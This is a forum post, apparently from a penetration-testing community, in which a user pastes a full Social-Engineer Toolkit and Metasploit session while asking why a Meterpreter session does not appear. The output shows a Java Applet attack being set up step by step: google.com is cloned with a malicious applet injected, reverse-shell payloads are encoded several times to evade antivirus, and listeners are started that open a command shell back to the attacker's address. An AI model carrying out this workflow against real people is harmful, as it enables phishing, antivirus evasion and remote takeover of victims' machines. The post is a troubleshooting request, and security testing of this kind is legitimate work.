
Originally Posted by sickness
Do you even get a message that a session was created? Paste all output and commands you make.
Yes, I get a message after the session was started.
Code:
root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set#
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Arduino-Based Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
99. Exit the Social-Engineer Toolkit
set > 2
1. Java Applet Attack Method
2. Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Create or import a CodeSigning Certificate
99. Return to the previous menu
set > 1
1. Web Templates
2. Site Cloner
3. Custom Import
set > 2
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://google.com
[*] Cloning the website: http://google.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: b8zvHv0
[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4. Windows Bind Shell Execute payload and create an accepting port on remote system
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10. Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11. SE Toolkit Interactive Shell This is the new custom interactive reverse shell designed for SET
12. RATTE HTTP Tunneling Payload This is a security bypass payload that will tunnel all comms over HTTP
13. Import your own executable Specify a path for your own executable
set > payloads > 2
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)
set > encoders> 2
[-] Enter the PORT of the listener (enter for default): (i use default)
[-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
********************************************************
Do you want to create a Linux/OSX reverse_tcp meterpreter
payload in the Java Applet attack as well?
********************************************************
Enter choice yes or no: yes
Enter the port to listen for on OSX (enter for default): (using default)
Enter the port to listen for on Linux (enter for default): (using default)
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
Length: 65
Options: {"LHOST"=>"192.168.100.38", "LPORT"=>"8080"}
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
Length: 50
Options: {"LHOST"=>"192.168.100.38", "LPORT"=>"8081"}
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 721 exploits - 362 auxiliary - 73 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13521 updated today (2011.08.11)
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.100.38
LHOST => 192.168.100.38
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.100.38
LHOST => 192.168.100.38
[*] Started reverse handler on 192.168.100.38:8080
resource (src/program_junk/meta_config)> set LPORT 8081
[*] Starting the payload handler...
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.100.38:8081
[*] Starting the payload handler...
[*] Sending stage (36 bytes) to 192.168.100.38
[*] Command shell session 1 opened (192.168.100.38:8081 -> 192.168.100.38:50962) at 2011-08-12 11:54:59 +0300
And no sign of meterpreter...